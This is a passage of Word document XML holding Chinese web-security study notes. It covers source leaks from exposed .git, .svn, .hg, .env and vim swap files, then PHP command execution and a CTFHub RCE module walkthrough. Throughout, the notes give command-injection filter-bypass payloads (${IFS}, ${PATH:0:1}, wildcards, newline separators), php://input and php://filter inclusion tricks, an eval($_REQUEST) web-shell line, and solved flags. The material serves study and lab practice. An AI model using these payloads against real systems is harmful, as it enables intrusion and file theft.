      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--exclude=.git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为什么危害大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git rm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 删不掉对象 —— 要 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reflog expire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gc --prune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 才彻底。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问 2：备份文件有哪些；vim 缓存有哪些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备份文件 6 类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（见 2.2.2）。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vim 缓存 3 类 8 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文件名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触发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swap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.文件名.swp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.swo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.swn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.swm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.swl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>...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编辑中崩溃/被 kill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undo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.文件名.un~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set undofile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backup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文件名~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set backup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swap 的三种取法（实测对比）：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可靠性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`grep -ao "flag{[^}]*}" .index.php.swp`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⭐⭐⭐ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>完整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strings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⭐⭐ 顺带能拿到服务器绝对路径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vim -r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19"/>
              </w:rPr>
              <w:t>可能只写了一半 → 恢复残缺</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>认知修正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">：不是"必须 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vim -r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"。swap 按块异步写，崩溃时可能只写一半，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反而更完整。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问 3：SVN 泄露由什么引起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在 web 目录 `svn checkout`，`.svn` 留在 web 根。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正确做法：`svn export`。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问 4：不同种类怎么获取泄露的信息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统一四步框架：探测 → 拿清单 → 取内容 → 解码。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① 探测</w:t>
            </w:r>
          </w:p>
        </w:tc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② 拿清单</w:t>
            </w:r>
          </w:p>
        </w:tc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③ 取内容</w:t>
            </w:r>
          </w:p>
        </w:tc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④ 解码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源码包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字典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解压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文件名当 URL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.bak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加后缀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curl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vim swp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.文件名.swp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curl -O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grep -a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.DS_Store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固定路径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解析 filename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文件名当 URL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ds_store</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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Git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.git/HEAD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reflog / index / refs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objects/&lt;h[:2]&gt;/&lt;h[2:]&gt;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zlib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SVN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.svn/wc.db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NODES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PRISTINE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pristine/&lt;h[:2]&gt;/&lt;h&gt;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原文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HG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.hg/requires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fncache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dirstate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store/data/&lt;编码名&gt;.i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zlib 或 `'u'`+原文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.env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固定路径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curl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base64 -d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三个版本库的差异只有三条：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差异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Git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SVN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HG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清单来源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reflog + index + refs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wc.db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（SQLite）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fncache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dirstate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内容路径由什么决定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内容哈希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内容哈希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文件名编码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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内容编码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zlib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原文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zlib 或 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>'u'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>+原文</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>记忆法：Git/SVN 按"内容指纹"找书（哈希），HG 按"书名"找书（文件名编码）。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问 5：信息泄露出现的最大原因（自思考）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一句话：不是"被攻破了什么"，而是"该藏的东西被当成了公开的东西"。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三层原因：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① 表层：开发环境和部署环境没有分离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开发需要：.git / .svn / .env / .swp / node_modules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部署该有：只有源码文件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用 clone / checkout / 拷整个目录 部署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开发环境的东西【全部】被当成网站内容发布了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② 认知：「看不见 = 不存在」的错觉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.git  .svn  .env  .DS_Store  .index.php.swp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└─────────────┬─────────────┘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都以 . 开头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ls 看不见 → 以为不存在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但 HTTP 请求不看你的 ls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③ 动机：便利优先于安全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便利做法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安全但麻烦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git clone</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 部署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git archive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 打干净包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svn checkout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 部署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svn export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.env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 放 web 根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环境变量 / 配置中心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备份放同目录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备份到 web 根之外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结论：信息泄露的根本原因不是技术问题，是流程问题。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防御靠的不是 WAF，是部署前那一条 `rm -rf .git .svn .env *.bak *.swp`。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五秒自查脚本：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for p in .git/HEAD .svn/entries .svn/wc.db .hg/requires .env .DS_Store \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www.zip index.php.bak .index.php.swp; do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code=$(curl -s -o /dev/null -w "%{http_code}" "https://your-site/$p")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[ "$code" = "200" ] &amp;&amp; echo "[!] 泄露: /$p"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done</w:t>
      </w:r>
    </w:p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2.4 复现证据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每个漏洞都在本地 `~/infoleak-lab` 或 Kali 的 `/tmp` 下用 `php -S` 复刻过：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本地复刻方式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Git 四种变体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git init</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 手工制造 reflog / stash / index 差异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SVN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svnadmin create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svn checkout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 删文件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HG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hg init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hg commit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hg rm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备份文件 / vim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直接造 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.bak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.swp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.DS_Store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Python 生成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典型复刻脚本位置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D:\VMs\logs\*.sh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gitlog-run.sh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svn-pwn.sh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hg-dig.sh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lfi-trace2.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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B63"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第三章 PHP 命令执行与绕过（1 day）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3.1 命令执行的根因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危险写法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system("ping -c 4 " . $_GET['ip']);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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用户输入: 127.0.0.1; cat /flag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拼出来的: ping -c 4 127.0.0.1; cat /flag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           ↑ 分号 = 命令分隔符 → 第二条被执行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两个层面：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层面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执行什么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函数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系统命令执行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交给 shell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system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exec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shell_exec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passthru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popen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proc_open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / 反引号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代码执行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交给 PHP 解释器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eval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assert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create_function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preg_replace(/e)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call_user_func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array_map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3.2 八个系统命令执行函数（PHP 8.4 实测）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测试命令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echo line1; echo line2; id -un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函数</w:t>
            </w:r>
          </w:p>
        </w:tc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直接回显</w:t>
            </w:r>
          </w:p>
        </w:tc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返回值</w:t>
            </w:r>
          </w:p>
        </w:tc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多行</w:t>
            </w:r>
          </w:p>
        </w:tc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退出码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`system()`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✅ 有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string</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（最后一行）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 第 2 参数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`exec()`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❌ 无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string</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（最后一行）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需第 2 参数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 第 3 参数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`shell_exec()`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❌ 无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string</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>全部输出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`` `反引号` ``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❌ 无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string</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（全部）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`passthru()`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✅ 有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（原始二进制）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null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 第 2 参数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`popen()`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❌ 无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resource</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（文件指针）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✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fread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✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pclose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`proc_open()`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❌ 无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resource</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（进程句柄）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 管道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✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>proc_close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`pcntl_exec()`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✅ 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无（替换进程）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实测输出对照：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             回显: line1\nline2\nkali\n    返回: 'kali'           退出码=0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exec               回显: （空）                    返回: 'kali'           退出码=0  数组=["line1","line2","kali"]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shell_exec         回显: （空）                    返回: 'line1\nline2\nkali\n'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passthru           回显: line1\nline2\nkali\n    返回: NULL             退出码=0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反引号 `cmd`       回显: （空）                    返回: 'line1\nline2\nkali\n'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popen+pclose       回显: （空）                    返回: 'line1\nline2\nkali\n' 退出码=0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proc_open          回显: （空）                    返回: 'line1\nline2\nkali\n' 退出码=0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三分类总结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【直接回显】结果直接进响应体，不需要变量接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system / passthru / pcntl_exec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【返回结果】结果装进变量，要 echo 才显示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exec（末行）/ shell_exec（全部）/ 反引号（全部）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【返回句柄】给你个指针，自己读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popen / proc_open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选型速查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需求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用哪个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要立刻看到结果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`system`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结果要处理/过滤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shell_exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>（全部字符串）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要多行数组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exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 第 2 参数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要退出码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system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exec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passthru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要 stderr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proc_open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双向交互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popen("w")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proc_open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无回显时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exec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shell_exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 拿返回值再外带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3.3 代码执行类函数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函数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版本限制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`eval()`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执行任意 PHP 代码（语言结构）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全版本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assert()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老版本可执行字符串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PHP 7.2+ 不再执行字符串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create_function()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动态造函数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PHP 7.2 废弃，8 移除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preg_replace(/e)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执行替换结果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PHP 7 移除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call_user_func()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call_user_func_array()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回调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全版本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array_map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array_filter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array_reduce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回调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全版本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usort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uasort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排序回调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全版本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ob_start()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输出缓冲回调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全版本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include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require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文件包含（配合伪协议）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全版本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PHP 8 实测：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eval("system('id');");                    // ✅ 有输出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assert("system('id');");                  // ❌ 8.x 不执行字符串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create_function('', 'system("id");');     // ❌ 8.x 已移除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preg_replace('/.*/e', 'system("id")', ''); // ❌ 7.x 已移除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call_user_func('system', 'id');           // ✅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array_map('system', ['id']);              // ✅</w:t>
      </w:r>
    </w:p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3.4 其它可注入命令的地方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mail($to,$sub,$msg,$hdr,$param)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第 5 参数传给 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sendmail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putenv("LD_PRELOAD=...")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设置环境变量，劫持动态库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imap_open($mailbox,...)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mailbox 参数可注入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error_log($msg, 1, $to)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$to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 传给 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sendmail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mb_send_mail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同 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mail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pcntl_exec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常被忘在 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>disable_functions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 之外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dl()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加载 PHP 扩展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ImageMagick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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8"/>
              </w:rPr>
              <w:t>convert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文件名注入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3.5 CTFHub RCE 模块通关（8 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题型</w:t>
            </w:r>
          </w:p>
        </w:tc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过滤</w:t>
            </w:r>
          </w:p>
        </w:tc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绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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flag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命令注入-无过滤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`\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cat`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eval 代码执行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?cmd=system("ls /");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ctfhub{7234bb617c6421e4b8e40365}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过滤 cat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tac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c\at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/bin/c?t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ctfhub{5c3d2c0615beb813269640b6}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过滤空格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空格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${IFS}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ctfhub{7d4f698eda802c44829c9db7}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过滤目录分隔符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/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${PATH:0:1}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ctfhub{fba85d19b6751d803b3cee7c}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过滤运算符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`\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sz w:val="19"/>
              </w:rPr>
              <w:t>&amp;`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;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / 换行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综合练习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8 项全过滤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见下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ctfhub{7d928b22123076276bb32251}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综合题的源码（最难的）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preg_match_all("/(\||&amp;|;| |\/|cat|flag|ctfhub)/", $ip, $m)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8 个过滤项：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模式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匹配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`\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&amp;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与号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;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分号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 xml:space="preserve"> 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空格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\/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斜杠（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 是定界符，要转义）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字符串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`flag`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字符串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字符串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最终 payload：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%0a${PATH:0:1}bin${PATH:0:1}c?t${IFS}f?ag_is_here${PATH:0:1}*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逐段拆解：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片段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%0a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换行（代替被过滤的 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> `\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${PATH:0:1}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/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bin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/bin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c?t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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 通配）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${IFS}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空格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f?ag_is_here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flag_is_here</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 通配）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*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目录里的文件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展开后：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/bin/cat /var/www/html/flag_is_here/flag_273182659722304.php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文件包含类（4 题，同属 RCE 模块）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题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过滤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打法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flag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文件包含 1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strpos($file,"flag")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借 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>shell.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 里的 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>eval($_REQUEST['ctfhub'])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ctfhub{b4e8289cf23e6289829fb568}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文件包含 2（必须 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php://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substr($file,0,6)==="php://"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php://input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + POST 代码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ctfhub{29c7fc65ea7034f067119535}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文件包含 3（必须 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>，flag 路径已知）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php://filter/resource=/flag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ctfhub{95366c4682c791d1ff3f4272}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文件包含 4（无 shell.txt）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strpos($file,"flag")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php://input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ctfhub{3e8215ea4ad95ff54cb15fe2}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3.6 绕过方式总结（6 类）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3.6.1 空格绕过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目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">：让 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cat /flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 里的空格不被过滤。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手法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payload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`${IFS}`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cat${IFS}/flag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最稳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$IFS$9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cat$IFS$9/flag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$IFS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cat$IFS/flag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花括号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{cat,/flag}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重定向 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;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cat&lt;/flag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制表符 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%09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cat%09/flag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$'\t'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cat$'\t'/flag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$'\x20'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cat$'\x20'/flag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⚠️ 反直觉的实测结果：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空格   (0x20) → ✅ 当空格用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制表   (0x09) → ✅ 当空格用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换行   (0x0a) → ❌ 不是空格 —— 它是【命令分隔符】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回车   (0x0d) → ❌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垂直制表 (0x0b) → ❌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`${IFS}` 是什么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IFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Internal Field Separator，shell 的分词符，默认值 = 空格 + 制表 + 换行。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为什么必须加 `{}`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echo$IFShello    → 变量名被解析成 "IFShello" → 空 ❌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echo${IFS}hello  → 明确变量名是 IFS → hello ✅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3.6.2 关键字绕过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手法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payload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反斜杠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ec\ho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单/双引号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ec''ho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ec""ho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变量拼接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a=ec;b=ho;$a$b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通配 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>?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/bin/ec?o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通配 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18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/bin/e*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⚠️ 会匹配到多个（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/bin/editor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 等）→ 失败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命令替换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$(echo ec)ho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反引号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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
